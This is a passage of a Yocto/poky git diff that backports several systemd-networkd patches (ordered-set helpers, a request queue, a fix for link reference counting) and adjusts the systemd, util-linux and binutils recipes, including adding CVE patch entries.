a/src/basic/ordered-set.c b/src/basic/ordered-set.c +index 7fdb47e064..fb82c17b5a 100644 +--- a/src/basic/ordered-set.c ++++ b/src/basic/ordered-set.c +@@ -4,6 +4,27 @@ + #include "ordered-set.h" + #include "strv.h" + ++int _ordered_set_ensure_allocated(OrderedSet **s, const struct hash_ops *ops HASHMAP_DEBUG_PARAMS) { ++ if (*s) ++ return 0; ++ ++ *s = _ordered_set_new(ops HASHMAP_DEBUG_PASS_ARGS); ++ if (!*s) ++ return -ENOMEM; ++ ++ return 0; ++} ++ ++int _ordered_set_ensure_put(OrderedSet **s, const struct hash_ops *ops, void *p HASHMAP_DEBUG_PARAMS) { ++ int r; ++ ++ r = _ordered_set_ensure_allocated(s, ops HASHMAP_DEBUG_PASS_ARGS); ++ if (r < 0) ++ return r; ++ ++ return ordered_set_put(*s, p); ++} ++ + int ordered_set_consume(OrderedSet *s, void *p) { + int r; + +diff --git a/src/basic/ordered-set.h b/src/basic/ordered-set.h +index a42a57eb49..2c241a808b 100644 +--- a/src/basic/ordered-set.h ++++ b/src/basic/ordered-set.h +@@ -7,20 +7,16 @@ + + typedef struct OrderedSet OrderedSet; + +-static inline OrderedSet* ordered_set_new(const struct hash_ops *ops) { +- return (OrderedSet*) ordered_hashmap_new(ops); ++static inline OrderedSet* _ordered_set_new(const struct hash_ops *ops HASHMAP_DEBUG_PARAMS) { ++ return (OrderedSet*) internal_ordered_hashmap_new(ops HASHMAP_DEBUG_PASS_ARGS); + } ++#define ordered_set_new(ops) _ordered_set_new(ops HASHMAP_DEBUG_SRC_ARGS) + +-static inline int ordered_set_ensure_allocated(OrderedSet **s, const struct hash_ops *ops) { +- if (*s) +- return 0; ++int _ordered_set_ensure_allocated(OrderedSet **s, const struct hash_ops *ops HASHMAP_DEBUG_PARAMS); ++#define ordered_set_ensure_allocated(s, ops) _ordered_set_ensure_allocated(s, ops HASHMAP_DEBUG_SRC_ARGS) + +- *s = ordered_set_new(ops); +- if (!*s) +- return -ENOMEM; +- +- return 0; +-} ++int _ordered_set_ensure_put(OrderedSet **s, const struct hash_ops *ops, void *p HASHMAP_DEBUG_PARAMS); ++#define ordered_set_ensure_put(s, hash_ops, key) _ordered_set_ensure_put(s, hash_ops, key HASHMAP_DEBUG_SRC_ARGS) + + static inline OrderedSet* ordered_set_free(OrderedSet *s) { + return (OrderedSet*) ordered_hashmap_free((OrderedHashmap*) s); diff --git a/poky/meta/recipes-core/systemd/systemd/introduce-ordered_set_clear-free-with-destructor.patch b/poky/meta/recipes-core/systemd/systemd/introduce-ordered_set_clear-free-with-destructor.patch new file mode 100644 index 0000000000..42b6e05b55 --- /dev/null +++ b/poky/meta/recipes-core/systemd/systemd/introduce-ordered_set_clear-free-with-destructor.patch @@ -0,0 +1,35 @@ +From d38a6476aad3f2cc80a2a4bc11f3898cc06a70f5 Mon Sep 17 00:00:00 2001 +From: Yu Watanabe +Date: Mon, 26 Apr 2021 23:52:40 +0900 +Subject: [PATCH] ordered-set: introduce + ordered_set_clear/free_with_destructor() + +Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/d38a6476aad3f2cc80a2a4bc11f3898cc06a70f5] +Signed-off-by: Ranjitsinh Rathod + +--- + src/basic/ordered-set.h | 11 +++++++++++ + 1 file changed, 11 insertions(+) + +diff --git a/src/basic/ordered-set.h b/src/basic/ordered-set.h +index a377f20b1f..64df41766f 100644 +--- a/src/basic/ordered-set.h ++++ b/src/basic/ordered-set.h +@@ -63,6 +63,17 @@ void ordered_set_print(FILE *f, const char *field, OrderedSet *s); + #define ORDERED_SET_FOREACH(e, s, i) \ + for ((i) = ITERATOR_FIRST; ordered_set_iterate((s), &(i), (void**)&(e)); ) + ++#define ordered_set_clear_with_destructor(s, f) \ ++ ({ \ ++ OrderedSet *_s = (s); \ ++ void *_item; \ ++ while ((_item = ordered_set_steal_first(_s))) \ ++ f(_item); \ ++ _s; \ ++ }) ++#define ordered_set_free_with_destructor(s, f) \ ++ ordered_set_free(ordered_set_clear_with_destructor(s, f)) ++ + DEFINE_TRIVIAL_CLEANUP_FUNC(OrderedSet*, ordered_set_free); + DEFINE_TRIVIAL_CLEANUP_FUNC(OrderedSet*, ordered_set_free_free); + diff --git a/poky/meta/recipes-core/systemd/systemd/network-add-skeleton-of-request-queue.patch b/poky/meta/recipes-core/systemd/systemd/network-add-skeleton-of-request-queue.patch new file mode 100644 index 0000000000..06c523834d --- /dev/null +++ b/poky/meta/recipes-core/systemd/systemd/network-add-skeleton-of-request-queue.patch @@ -0,0 +1,285 @@ +From 19d9a5adf0c1a6b5a243eea0390f6f6526d569de Mon Sep 17 00:00:00 2001 +From: Yu Watanabe +Date: Fri, 7 May 2021 15:39:16 +0900 +Subject: [PATCH] network: add skeleton of request queue + +This will be used in later commits. + +Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/19d9a5adf0c1a6b5a243eea0390f6f6526d569de] +Signed-off-by: Ranjitsinh Rathod + +--- + src/network/meson.build | 2 + + src/network/networkd-link.c | 20 +++++- + src/network/networkd-manager.c | 7 ++ + src/network/networkd-manager.h | 2 + + src/network/networkd-queue.c | 121 +++++++++++++++++++++++++++++++++ + src/network/networkd-queue.h | 42 ++++++++++++ + 6 files changed, 192 insertions(+), 2 deletions(-) + create mode 100644 src/network/networkd-queue.c + create mode 100644 src/network/networkd-queue.h + +diff --git a/src/network/meson.build b/src/network/meson.build +index 4fca3106dc..a8b9232e64 100644 +--- a/src/network/meson.build ++++ b/src/network/meson.build +@@ -105,6 +105,8 @@ sources = files(''' + networkd-network.h + networkd-nexthop.c + networkd-nexthop.h ++ networkd-queue.c ++ networkd-queue.h + networkd-route.c + networkd-route.h + networkd-routing-policy-rule.c +diff --git a/src/network/networkd-link.c b/src/network/networkd-link.c +index 34359b2541..2f33305a27 100644 +--- a/src/network/networkd-link.c ++++ b/src/network/networkd-link.c +@@ -30,6 +30,7 @@ + #include "networkd-manager.h" + #include "networkd-ndisc.h" + #include "networkd-neighbor.h" ++#include "networkd-queue.h" + #include "networkd-radv.h" + #include "networkd-routing-policy-rule.h" + #include "networkd-wifi.h" + +@@ -2232,6 +2244,8 @@ static int link_reconfigure_internal(Link *link, sd_netlink_message *m, bool for + if (r < 0) + return r; + ++ link_drop_requests(link); ++ + r = link_drop_config(link); + if (r < 0) + return r; +@@ -2664,6 +2678,8 @@ static int link_carrier_lost(Link *link) { + return r; + } + ++ link_drop_requests(link); ++ + r = link_drop_config(link); + if (r < 0) + return r; +diff --git a/src/network/networkd-manager.c b/src/network/networkd-manager.c +index 562ce5ca54..fd576169a9 100644 +--- a/src/network/networkd-manager.c ++++ b/src/network/networkd-manager.c +@@ -34,6 +34,7 @@ + #include "networkd-manager-bus.h" + #include "networkd-manager.h" + #include "networkd-network-bus.h" ++#include "networkd-queue.h" + #include "networkd-speed-meter.h" + #include "ordered-set.h" + #include "path-util.h" +@@ -406,6 +407,10 @@ int manager_new(Manager **ret) { + if (r < 0) + return r; + ++ r = sd_event_add_post(m->event, NULL, manager_process_requests, m); ++ if (r < 0) ++ return r; ++ + r = manager_connect_rtnl(m); + if (r < 0) + return r; +@@ -446,6 +451,8 @@ Manager* manager_free(Manager *m) { + + free(m->state_file); + ++ m->request_queue = ordered_set_free_with_destructor(m->request_queue, request_free); ++ + while ((a = hashmap_first_key(m->dhcp6_prefixes))) + (void) dhcp6_prefix_remove(m, a); + m->dhcp6_prefixes = hashmap_free(m->dhcp6_prefixes); +diff --git a/src/network/networkd-manager.h b/src/network/networkd-manager.h +index 301b97c1a1..26e8802871 100644 +--- a/src/network/networkd-manager.h ++++ b/src/network/networkd-manager.h +@@ -91,6 +91,8 @@ struct Manager { + usec_t speed_meter_usec_old; + + bool dhcp4_prefix_root_cannot_set_table; ++ ++ OrderedSet *request_queue; + }; + + int manager_new(Manager **ret); +diff --git a/src/network/networkd-queue.c b/src/network/networkd-queue.c +new file mode 100644 +index 0000000000..24bb2c845d +--- /dev/null ++++ b/src/network/networkd-queue.c +@@ -0,0 +1,121 @@ ++/* SPDX-License-Identifier: LGPL-2.1-or-later */ ++ ++#include "networkd-address.h" ++#include "networkd-manager.h" ++#include "networkd-neighbor.h" ++#include "networkd-nexthop.h" ++#include "networkd-route.h" ++#include "networkd-routing-policy-rule.h" ++#include "networkd-queue.h" ++ ++static void request_free_object(RequestType type, void *object) { ++ switch(type) { ++ default: ++ assert_not_reached("invalid request type."); ++ } ++} ++ ++Request *request_free(Request *req) { ++ if (!req) ++ return NULL; ++ ++ if (req->on_free) ++ req->on_free(req); ++ if (req->consume_object) ++ request_free_object(req->type, req->object); ++ if (req->link && req->link->manager) ++ ordered_set_remove(req->link->manager->request_queue, req); ++ link_unref(req->link); ++ ++ return mfree(req); ++} ++ ++DEFINE_TRIVIAL_CLEANUP_FUNC(Request*, request_free); ++ ++void request_drop(Request *req) { ++ if (req->message_counter) ++ (*req->message_counter)--; ++ ++ request_free(req); ++} ++ ++int link_queue_request( ++ Link *link, ++ RequestType type, ++ void *object, ++ bool consume_object, ++ unsigned *message_counter, ++ link_netlink_message_handler_t netlink_handler, ++ Request **ret) { ++ ++ _cleanup_(request_freep) Request *req = NULL; ++ int r; ++ ++ assert(link); ++ assert(link->manager); ++ assert(type >= 0 && type < _REQUEST_TYPE_MAX); ++ assert(object); ++ assert(netlink_handler); ++ ++ req = new(Request, 1); ++ if (!req) { ++ if (consume_object) ++ request_free_object(type, object); ++ return -ENOMEM; ++ } ++ ++ *req = (Request) { ++ .link = link, ++ .type = type, ++ .object = object, ++ .consume_object = consume_object, ++ .message_counter = message_counter, ++ .netlink_handler = netlink_handler, ++ }; ++ ++ link_ref(link); ++ ++ r = ordered_set_ensure_put(&link->manager->request_queue, NULL, req); ++ if (r < 0) ++ return r; ++ ++ if (req->message_counter) ++ (*req->message_counter)++; ++ ++ if (ret) ++ *ret = req; ++ ++ TAKE_PTR(req); ++ return 0; ++} ++ ++int manager_process_requests(sd_event_source *s, void *userdata) { ++ Manager *manager = userdata; ++ int r; ++ ++ assert(manager); ++ ++ for (;;) { ++ bool processed = false; ++ Request *req; ++ Iterator i; ++ ORDERED_SET_FOREACH(req, manager->request_queue, i) { ++ switch(req->type) { ++ default: ++ return -EINVAL; ++ } ++ if (r < 0) ++ link_enter_failed(req->link); ++ if (r > 0) { ++ ordered_set_remove(manager->request_queue, req); ++ request_free(req); ++ processed = true; ++ } ++ } ++ ++ if (!processed) ++ break; ++ } ++ ++ return 0; ++} +diff --git a/src/network/networkd-queue.h b/src/network/networkd-queue.h +new file mode 100644 +index 0000000000..4558ae548f +--- /dev/null ++++ b/src/network/networkd-queue.h +@@ -0,0 +1,42 @@ ++/* SPDX-License-Identifier: LGPL-2.1-or-later */ ++#pragma once ++ ++#include "sd-event.h" ++ ++#include "networkd-link.h" ++ ++typedef struct Request Request; ++ ++typedef int (*request_after_configure_handler_t)(Request*, void*); ++typedef void (*request_on_free_handler_t)(Request*); ++ ++typedef enum RequestType { ++ _REQUEST_TYPE_MAX, ++ _REQUEST_TYPE_INVALID = -EINVAL, ++} RequestType; ++ ++typedef struct Request { ++ Link *link; ++ RequestType type; ++ bool consume_object; ++ void *object; ++ void *userdata; ++ unsigned *message_counter; ++ link_netlink_message_handler_t netlink_handler; ++ request_after_configure_handler_t after_configure; ++ request_on_free_handler_t on_free; ++} Request; ++ ++Request *request_free(Request *req); ++void request_drop(Request *req); ++ ++int link_queue_request( ++ Link *link, ++ RequestType type, ++ void *object, ++ bool consume_object, ++ unsigned *message_counter, ++ link_netlink_message_handler_t netlink_handler, ++ Request **ret); ++ ++int manager_process_requests(sd_event_source *s, void *userdata); diff --git a/poky/meta/recipes-core/systemd/systemd/network-also-drop-requests-when-link-enters-linger-state.patch b/poky/meta/recipes-core/systemd/systemd/network-also-drop-requests-when-link-enters-linger-state.patch new file mode 100644 index 0000000000..4c402e7e55 --- /dev/null +++ b/poky/meta/recipes-core/systemd/systemd/network-also-drop-requests-when-link-enters-linger-state.patch @@ -0,0 +1,50 @@ +From 56001f023305ea99329e27141d6e6067596491a9 Mon Sep 17 00:00:00 2001 +From: Yu Watanabe +Date: Mon, 17 May 2021 15:32:57 +0900 +Subject: [PATCH] network: also drop requests when link enters linger state + +Otherwise, if link is removed, several references to the link in remain +exist in requests. + +Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/56001f023305ea99329e27141d6e6067596491a9] +Signed-off-by: Ranjitsinh Rathod + +--- + src/network/networkd-link.c | 24 +++++++++++++----------- + 1 file changed, 13 insertions(+), 11 deletions(-) + +diff --git a/src/network/networkd-link.c b/src/network/networkd-link.c +index 67d01ac44d..b56c232eca 100644 +--- a/src/network/networkd-link.c ++++ b/src/network/networkd-link.c +@@ -1771,6 +1771,18 @@ static void link_drop_from_master(Link *link, NetDev *netdev) { + link_unref(set_remove(master->slaves, link)); + } + ++static void link_drop_requests(Link *link) { ++ Request *req; ++ Iterator i; ++ ++ assert(link); ++ assert(link->manager); ++ ++ ORDERED_SET_FOREACH(req, link->manager->request_queue, i) ++ if (req->link == link) ++ request_drop(req); ++} ++ + void link_drop(Link *link) { + if (!link) + return; +@@ -1782,6 +1793,8 @@ void link_drop(Link *link) { + /* Drop all references from other links and manager. Note that async netlink calls may have + * references to the link, and they will be dropped when we receive replies. */ + ++ link_drop_requests(link); ++ + link_free_carrier_maps(link); + + if (link->network) { +-- +2.17.1 + diff --git a/poky/meta/recipes-core/systemd/systemd/network-fix-Link-reference-counter-issue.patch b/poky/meta/recipes-core/systemd/systemd/network-fix-Link-reference-counter-issue.patch new file mode 100644 index 0000000000..a186bb4095 --- /dev/null +++ b/poky/meta/recipes-core/systemd/systemd/network-fix-Link-reference-counter-issue.patch @@ -0,0 +1,278 @@ +From cc2d7efc5ca09a7de4bec55e80476986839a655c Mon Sep 17 00:00:00 2001 +From: Yu Watanabe +Date: Fri, 14 May 2021 15:58:15 +0900 +Subject: [PATCH] network: fix Link reference counter issue + +Previously, when link_new() fails, `link_unref()` was called, so, +`Manager::links` may become dirty. +This introduces `link_drop_or_unref()` and it will be called on +failure. + +Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/cc2d7efc5ca09a7de4bec55e80476986839a655c] +Signed-off-by: Ranjitsinh Rathod + +--- + src/network/networkd-link.c | 240 ++++++++++++++++++------------------ + 1 file changed, 122 insertions(+), 118 deletions(-) + +diff --git a/src/network/networkd-link.c b/src/network/networkd-link.c +index b56c232eca..d493afda4c 100644 +--- a/src/network/networkd-link.c ++++ b/src/network/networkd-link.c +@@ -540,109 +540,6 @@ static int link_update_flags(Link *link, + return 0; + } + +-static int link_new(Manager *manager, sd_netlink_message *message, Link **ret) { +- _cleanup_(link_unrefp) Link *link = NULL; +- uint16_t type; +- const char *ifname, *kind = NULL; +- int r, ifindex; +- unsigned short iftype; +- +- assert(manager); +- assert(message); +- assert(ret); +- +- /* check for link kind */ +- r = sd_netlink_message_enter_container(message, IFLA_LINKINFO); +- if (r == 0) { +- (void) sd_netlink_message_read_string(message, IFLA_INFO_KIND, &kind); +- r = sd_netlink_message_exit_container(message); +- if (r < 0) +- return r; +- } +- +- r = sd_netlink_message_get_type(message, &type); +- if (r < 0) +- return r; +- else if (type != RTM_NEWLINK) +- return -EINVAL; +- +- r = sd_rtnl_message_link_get_ifindex(message, &ifindex); +- if (r < 0) +- return r; +- else if (ifindex <= 0) +- return -EINVAL; +- +- r = sd_rtnl_message_link_get_type(message, &iftype); +- if (r < 0) +- return r; +- +- r = sd_netlink_message_read_string(message, IFLA_IFNAME, &ifname); +- if (r < 0) +- return r; +- +- link = new(Link, 1); +- if (!link) +- return -ENOMEM; +- +- *link = (Link) { +- .n_ref = 1, +- .manager = manager, +- .state = LINK_STATE_PENDING, +- .ifindex = ifindex, +- .iftype = iftype, +- +- .n_dns = (unsigned) -1, +- .dns_default_route = -1, +- .llmnr = _RESOLVE_SUPPORT_INVALID, +- .mdns = _RESOLVE_SUPPORT_INVALID, +- .dnssec_mode = _DNSSEC_MODE_INVALID, +- .dns_over_tls_mode = _DNS_OVER_TLS_MODE_INVALID, +- }; +- +- link->ifname = strdup(ifname); +- if (!link->ifname) +- return -ENOMEM; +- +- if (kind) { +- link->kind = strdup(kind); +- if (!link->kind) +- return -ENOMEM; +- } +- +- r = sd_netlink_message_read_u32(message, IFLA_MASTER, (uint32_t *)&link->master_ifindex); +- if (r < 0) +- log_link_debug_errno(link, r, "New device has no master, continuing without"); +- +- r = sd_netlink_message_read_ether_addr(message, IFLA_ADDRESS, &link->mac); +- if (r < 0) +- log_link_debug_errno(link, r, "MAC address not found for new device, continuing without"); +- +- if (asprintf(&link->state_file, "/run/systemd/netif/links/%d", link->ifindex) < 0) +- return -ENOMEM; +- +- if (asprintf(&link->lease_file, "/run/systemd/netif/leases/%d", link->ifindex) < 0) +- return -ENOMEM; +- +- if (asprintf(&link->lldp_file, "/run/systemd/netif/lldp/%d", link->ifindex) < 0) +- return -ENOMEM; +- +- r = hashmap_ensure_allocated(&manager->links, NULL); +- if (r < 0) +- return r; +- +- r = hashmap_put(manager->links, INT_TO_PTR(link->ifindex), link); +- if (r < 0) +- return r; +- +- r = link_update_flags(link, message, false); +- if (r < 0) +- return r; +- +- *ret = TAKE_PTR(link); +- +- return 0; +-} +- + void link_ntp_settings_clear(Link *link) { + link->ntp = strv_free(link->ntp); + } +@@ -2030,9 +1927,9 @@ static void link_drop_requests(Link *lin + request_drop(req); + } + +-void link_drop(Link *link) { ++Link *link_drop(Link *link) { + if (!link) +- return; ++ return NULL; + + assert(link->manager); + +@@ -2057,7 +1954,7 @@ void link_drop(Link *link) { + + /* The following must be called at last. */ + assert_se(hashmap_remove(link->manager->links, INT_TO_PTR(link->ifindex)) == link); +- link_unref(link); ++ return link_unref(link); + } + + static int link_joined(Link *link) { +@@ -3295,6 +3192,112 @@ ipv4ll_address_fail: + + return 0; + } ++ ++static Link *link_drop_or_unref(Link *link) { ++ if (!link) ++ return NULL; ++ if (!link->manager) ++ return link_unref(link); ++ return link_drop(link); ++} ++ ++DEFINE_TRIVIAL_CLEANUP_FUNC(Link*, link_drop_or_unref); ++ ++static int link_new(Manager *manager, sd_netlink_message *message, Link **ret) { ++ _cleanup_(link_drop_or_unrefp) Link *link = NULL; ++ uint16_t type; ++ _cleanup_free_ char *ifname = NULL, *kind = NULL; ++ int r, ifindex; ++ unsigned short iftype; ++ ++ assert(manager); ++ assert(message); ++ assert(ret); ++ ++ r = sd_netlink_message_get_type(message, &type); ++ if (r < 0) ++ return r; ++ else if (type != RTM_NEWLINK) ++ return -EINVAL; ++ ++ r = sd_rtnl_message_link_get_ifindex(message, &ifindex); ++ if (r < 0) ++ return r; ++ else if (ifindex <= 0) ++ return -EINVAL; ++ ++ r = sd_rtnl_message_link_get_type(message, &iftype); ++ if (r < 0) ++ return r; ++ ++ r = sd_netlink_message_read_string_strdup(message, IFLA_IFNAME, &ifname); ++ if (r < 0) ++ return r; ++ ++ /* check for link kind */ ++ r = sd_netlink_message_enter_container(message, IFLA_LINKINFO); ++ if (r >= 0) { ++ (void) sd_netlink_message_read_string_strdup(message, IFLA_INFO_KIND, &kind); ++ r = sd_netlink_message_exit_container(message); ++ if (r < 0) ++ return r; ++ } ++ ++ link = new(Link, 1); ++ if (!link) ++ return -ENOMEM; ++ ++ *link = (Link) { ++ .n_ref = 1, ++ .state = LINK_STATE_PENDING, ++ .ifindex = ifindex, ++ .iftype = iftype, ++ .ifname = TAKE_PTR(ifname), ++ .kind = TAKE_PTR(kind), ++ ++ .n_dns = (unsigned) -1, ++ .dns_default_route = -1, ++ .llmnr = _RESOLVE_SUPPORT_INVALID, ++ .mdns = _RESOLVE_SUPPORT_INVALID, ++ .dnssec_mode = _DNSSEC_MODE_INVALID, ++ .dns_over_tls_mode = _DNS_OVER_TLS_MODE_INVALID, ++ }; ++ ++ r = hashmap_ensure_allocated(&manager->links, NULL); ++ if (r < 0) ++ return r; ++ ++ r = hashmap_put(manager->links, INT_TO_PTR(link->ifindex), link); ++ if (r < 0) ++ return r; ++ ++ link->manager = manager; ++ ++ r = sd_netlink_message_read_u32(message, IFLA_MASTER, (uint32_t*) &link->master_ifindex); ++ if (r < 0) ++ log_link_debug_errno(link, r, "New device has no master, continuing without"); ++ ++ r = sd_netlink_message_read_ether_addr(message, IFLA_ADDRESS, &link->mac); ++ if (r < 0) ++ log_link_debug_errno(link, r, "MAC address not found for new device, continuing without"); ++ ++ if (asprintf(&link->state_file, "/run/systemd/netif/links/%d", link->ifindex) < 0) ++ return -ENOMEM; ++ ++ if (asprintf(&link->lease_file, "/run/systemd/netif/leases/%d", link->ifindex) < 0) ++ return -ENOMEM; ++ ++ if (asprintf(&link->lldp_file, "/run/systemd/netif/lldp/%d", link->ifindex) < 0) ++ return -ENOMEM; ++ ++ r = link_update_flags(link, message, false); ++ if (r < 0) ++ return r; ++ ++ *ret = TAKE_PTR(link); ++ ++ return 0; ++} + + int link_add(Manager *m, sd_netlink_message *message, Link **ret) { + _cleanup_(sd_device_unrefp) sd_device *device = NULL; + +--- a/src/network/networkd-link.h 2021-09-02 18:04:16.900542857 +0530 ++++ b/src/network/networkd-link.h 2021-09-02 18:18:56.776571563 +0530 +@@ -175,7 +175,7 @@ DEFINE_TRIVIAL_DESTRUCTOR(link_netlink_d + + int link_get(Manager *m, int ifindex, Link **ret); + int link_add(Manager *manager, sd_netlink_message *message, Link **ret); +-void link_drop(Link *link); ++Link *link_drop(Link *link); + + int link_down(Link *link, link_netlink_message_handler_t callback); + + diff --git a/poky/meta/recipes-core/systemd/systemd/network-merge-link_drop-and-link_detach_from_manager.patch b/poky/meta/recipes-core/systemd/systemd/network-merge-link_drop-and-link_detach_from_manager.patch new file mode 100644 index 0000000000..65bdc611df --- /dev/null +++ b/poky/meta/recipes-core/systemd/systemd/network-merge-link_drop-and-link_detach_from_manager.patch @@ -0,0 +1,67 @@ +From 63130eb36dc51e4fd50716c585f98ebe456ca7cf Mon Sep 17 00:00:00 2001 +From: Yu Watanabe +Date: Mon, 17 May 2021 15:40:15 +0900 +Subject: [PATCH] network: merge link_drop() and link_detach_from_manager() + +link_detach_from_manager() is only called by link_drop(). It is not +necessary to split such tiny function. + +Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/63130eb36dc51e4fd50716c585f98ebe456ca7cf] +Signed-off-by: Ranjitsinh Rathod + +--- + src/network/networkd-link.c | 27 ++++++++++++--------------- + 1 file changed, 12 insertions(+), 15 deletions(-) + +diff --git a/src/network/networkd-link.c b/src/network/networkd-link.c +index 9d30e16b0a..67d01ac44d 100644 +--- a/src/network/networkd-link.c ++++ b/src/network/networkd-link.c +@@ -2019,24 +2019,17 @@ static void link_drop_from_master(Link *link, NetDev *netdev) { + link_unref(set_remove(master->slaves, link)); + } + +-static void link_detach_from_manager(Link *link) { +- if (!link || !link->manager) +- return; +- +- link_unref(set_remove(link->manager->links_requesting_uuid, link)); +- link_clean(link); +- +- /* The following must be called at last. */ +- assert_se(hashmap_remove(link->manager->links, INT_TO_PTR(link->ifindex)) == link); +- link_unref(link); +-} +- + void link_drop(Link *link) { +- if (!link || link->state == LINK_STATE_LINGER) ++ if (!link) + return; + ++ assert(link->manager); ++ + link_set_state(link, LINK_STATE_LINGER); + ++ /* Drop all references from other links and manager. Note that async netlink calls may have ++ * references to the link, and they will be dropped when we receive replies. */ ++ + link_free_carrier_maps(link); + + if (link->network) { +@@ -2044,10 +2037,14 @@ void link_drop(Link *link) { + link_drop_from_master(link, link->network->bond); + } + +- log_link_debug(link, "Link removed"); ++ link_unref(set_remove(link->manager->links_requesting_uuid, link)); + + (void) unlink(link->state_file); +- link_detach_from_manager(link); ++ link_clean(link); ++ ++ /* The following must be called at last. */ ++ assert_se(hashmap_remove(link->manager->links, INT_TO_PTR(link->ifindex)) == link); ++ link_unref(link); + } + + static int link_joined(Link *link) { diff --git a/poky/meta/recipes-core/systemd/systemd_244.5.bb b/poky/meta/recipes-core/systemd/systemd_244.5.bb index 7a7eddcd45..b6f5a47d63 100644 --- a/poky/meta/recipes-core/systemd/systemd_244.5.bb +++ b/poky/meta/recipes-core/systemd/systemd_244.5.bb @@ -22,6 +22,12 @@ SRC_URI += "file://touchscreen.rules \ file://0003-implment-systemd-sysv-install-for-OE.patch \ file://CVE-2021-33910.patch \ file://CVE-2020-13529.patch \ + file://basic-pass-allocation-info-for-ordered-set-new-and-introd.patch \ + file://introduce-ordered_set_clear-free-with-destructor.patch \ + file://network-add-skeleton-of-request-queue.patch \ + file://network-merge-link_drop-and-link_detach_from_manager.patch \ + file://network-also-drop-requests-when-link-enters-linger-state.patch \ + file://network-fix-Link-reference-counter-issue.patch \ " # patches needed by musl @@ -90,6 +96,7 @@ PACKAGECONFIG ??= " \ timesyncd \ utmp \ vconsole \ + wheel-group \ xz \ " @@ -182,6 +189,7 @@ PACKAGECONFIG[sbinmerge] = "-Dsplit-bin=false,-Dsplit-bin=true" PACKAGECONFIG[utmp] = "-Dutmp=true,-Dutmp=false" PACKAGECONFIG[valgrind] = "-DVALGRIND=1,,valgrind" PACKAGECONFIG[vconsole] = "-Dvconsole=true,-Dvconsole=false,,${PN}-vconsole-setup" +PACKAGECONFIG[wheel-group] = "-Dwheel-group=true, -Dwheel-group=false" # Verify keymaps on locale change PACKAGECONFIG[xkbcommon] = "-Dxkbcommon=true,-Dxkbcommon=false,libxkbcommon" PACKAGECONFIG[xz] = "-Dxz=true,-Dxz=false,xz" diff --git a/poky/meta/recipes-core/update-rc.d/update-rc.d_0.8.bb b/poky/meta/recipes-core/update-rc.d/update-rc.d_0.8.bb index da716674c3..daee5c224b 100644 --- a/poky/meta/recipes-core/update-rc.d/update-rc.d_0.8.bb +++ b/poky/meta/recipes-core/update-rc.d/update-rc.d_0.8.bb @@ -6,7 +6,7 @@ SECTION = "base" LICENSE = "GPLv2+" LIC_FILES_CHKSUM = "file://update-rc.d;beginline=5;endline=15;md5=d40a07c27f535425934bb5001f2037d9" -SRC_URI = "git://git.yoctoproject.org/update-rc.d" +SRC_URI = "git://git.yoctoproject.org/update-rc.d;branch=master" SRCREV = "8636cf478d426b568c1be11dbd9346f67e03adac" UPSTREAM_CHECK_COMMITS = "1" diff --git a/poky/meta/recipes-core/util-linux/util-linux.inc b/poky/meta/recipes-core/util-linux/util-linux.inc index 0e85603d9a..7b780352be 100644 --- a/poky/meta/recipes-core/util-linux/util-linux.inc +++ b/poky/meta/recipes-core/util-linux/util-linux.inc @@ -59,12 +59,13 @@ python util_linux_binpackages () { continue pkg = os.path.basename(os.readlink(file)) - extras[pkg] = extras.get(pkg, '') + ' ' + file.replace(dvar, '', 1) + extras.setdefault(pkg, []) + extras[pkg].append(file.replace(dvar, '', 1)) pn = d.getVar('PN') for pkg, links in extras.items(): of = d.getVar('FILES_' + pn + '-' + pkg) - links = of + links + links = of + " " + " ".join(sorted(links)) d.setVar('FILES_' + pn + '-' + pkg, links) } @@ -94,7 +95,7 @@ EXTRA_OECONF = "\ \ --disable-bfs --disable-chfn-chsh --disable-login \ --disable-makeinstall-chown --disable-minix --disable-newgrp \ - --disable-use-tty-group --disable-vipw \ + --disable-use-tty-group --disable-vipw --disable-raw \ \ --without-udev \ \ diff --git a/poky/meta/recipes-devtools/binutils/binutils-2.34.inc b/poky/meta/recipes-devtools/binutils/binutils-2.34.inc index 3e10279b1d..6104bec591 100644 --- a/poky/meta/recipes-devtools/binutils/binutils-2.34.inc +++ b/poky/meta/recipes-devtools/binutils/binutils-2.34.inc @@ -48,5 +48,7 @@ SRC_URI = "\ file://CVE-2020-16598.patch \ file://CVE-2021-20197.patch \ file://CVE-2021-3487.patch \ + file://CVE-2021-3549.patch \ + file://CVE-2020-16593.patch \ " S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-devtools/binutils/binutils/0009-warn-for-uses-of-system-directories-when-cross-linki.patch b/poky/meta/recipes-devtools/binutils/binutils/0009-warn-for-uses-of-system-directories-when-cross-linki.patch index 11a8110d40..88cce49e46 100644 --- a/poky/meta/recipes-devtools/binutils/binutils/0009-warn-for-uses-of-system-directories-when-cross-linki.patch +++ b/poky/meta/recipes-devtools/binutils/binutils/0009-warn-for-uses-of-system-directories-when-cross-linki.patch @@ -1,4 +1,4 @@ -From 7b24f81e04c9d00d96de7dbd250beade6d2c6e44 Mon Sep 17 00:00:00 2001 +From 12b658c0fe5771d16067baef933b7f34ed455def Mon Sep 17 00:00:00 2001 From: Khem Raj Date: Fri, 15 Jan 2016 06:31:09 +0000 Subject: [PATCH] warn for uses of system directories when cross linking @@ -59,8 +59,8 @@ Signed-off-by: Khem Raj ld/ldfile.c | 17 +++++++++++++++++ ld/ldlex.h | 2 ++ ld/ldmain.c | 2 ++ - ld/lexsup.c | 15 +++++++++++++++ - 9 files changed, 85 insertions(+) + ld/lexsup.c | 16 ++++++++++++++++ + 9 files changed, 86 insertions(+) diff --git a/ld/config.in b/ld/config.in index d93c9b0830..5da2742bea 100644 @@ -77,10 +77,10 @@ index d93c9b0830..5da2742bea 100644 #undef EXTRA_SHLIB_EXTENSION diff --git a/ld/configure b/ld/configure -index 811134a503..f8c17c19ae 100755 +index f432f4637d..a9da3c115e 100755 --- a/ld/configure +++ b/ld/configure -@@ -826,6 +826,7 @@ with_lib_path +@@ -830,6 +830,7 @@ with_lib_path enable_targets enable_64_bit_bfd with_sysroot @@ -88,7 +88,7 @@ index 811134a503..f8c17c19ae 100755 enable_gold enable_got enable_compressed_debug_sections -@@ -1491,6 +1492,8 @@ Optional Features: +@@ -1495,6 +1496,8 @@ Optional Features: --disable-largefile omit support for large files --enable-targets alternative target configurations --enable-64-bit-bfd 64-bit support (on hosts with narrower word sizes) @@ -97,7 +97,7 @@ index 